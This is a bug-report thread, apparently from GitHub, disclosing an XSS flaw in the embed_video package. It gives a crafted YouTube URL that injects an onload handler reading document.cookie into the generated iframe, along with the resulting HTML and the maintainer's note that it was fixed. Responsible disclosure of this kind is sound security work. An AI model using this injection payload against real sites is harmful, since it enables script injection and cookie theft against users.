XSS possible in YoutubeBackend with user-provided URL
Remiz opened this issue · comments
Remi commented
Hi,
I think I've noticed a possible XSS using this package when users are allowed to provide urls.
Here is the code I've used reproduce the issue:
import embed_video
url = 'https://www.youtube.com/watch?v=\asa\C0DPdy98e4c?wmode=opa\queenablejsapi=1origin=https%3A%2F%2Fwww.aa%22aaaa.com onload=%22javascript:alert(document.cookie)%22'
video = embed_video.backends.detect_backend(url)
video.is_secure = True
print(video.get_embed_code(800, 400))
And here is the result of the embedded code:
<iframe width="800" height="400" src="https://www.youtube.com/embed/sa\C0DPdy98e4c?wmode=opa\queenablejsapi=1origin=https://www.aa"aaaa.com onload="javascript:alert(document.cookie)"?wmode=opaque" loading="lazy" frameborder="0" allowfullscreen></iframe>
It looks like the url encoded double quotes are decoded by urlparse.parse_qs somehow.
Aleksi Häkli commented
Hi and thanks for catching this.
The URL needs to be validated and sanitized. Would anyone happen to have ideas and time for improving the security?
Aleksi Häkli commented
Fixed by #187